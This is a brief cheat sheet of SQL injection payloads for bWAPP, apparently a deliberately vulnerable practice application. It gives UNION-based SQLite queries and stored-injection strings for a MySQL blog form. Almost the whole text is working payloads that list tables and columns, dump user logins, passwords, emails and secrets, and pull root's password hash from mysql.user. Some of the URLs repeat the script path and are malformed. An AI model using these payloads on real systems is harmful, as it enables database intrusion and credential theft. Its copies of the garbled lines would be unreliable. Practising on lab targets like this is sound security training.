SQL Injection(SQLite)
Get SQLite version
bWAPP/sqli_11.php?title=k' UNION SELECT 1,sqlite_version(),3,4,5,6-- &action=search
Get tables
bWAPP/sqli_11.php?title=k' UNION SELECT 1,tbl_name,3,4,5,6 from sqlite_master;-- &action=search
Get columns
For all tables:bWAPP/sqli_11.php?title=sqli_11.php?title=k' UNION SELECT 1,sql,3,4,5,6 from sqlite_master;-- &action=search For table 'users':bWAPP/sqli_11.php?title=sqli_11.php?title=k' UNION SELECT 1,sql,3,4,5,6 from sqlite_master where tbl_name='users';-- &action=search
Get data
bWAPP/sqli_11.php?title=sqli_11.php?title=k' UNION SELECT 1,login,password,email,secret,6 from users;-- &action=search
SQL Injection - Stored (Blog)
Assume the sql query is: INSERT USERS (content, user) VALUES ('msg', 'username')
Get current user: entry=aa',(select user()));-- &blog=add
Get root's password: entry=aa',(select password from mysql.user where user='root' limit 0,1));-- &blog=add
Get tables: entry=aa',(SELECT GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()));-- &blog=add OR entry=aa',(SELECT GROUP_CONCAT(table_name)as data FROM (select table_name from information_schema.tables where table_schema=database()) as total));-- &blog=add
Get columns: entry=aa',(SELECT GROUP_CONCAT(column_name) from information_schema.columns where table_schema=database() and table_name='users'));-- &blog=add
Get data: entry=aa',(SELECT GROUP_CONCAT(id,0x5c,login,0x5c,password,0x5c,email,0x5c,secret) as data FROM (select id,login,password,email,secret from users limit 1,1) as total));-- &blog=add --> Use this query can make limit work, i.e, you can get every user's info by using limit clause.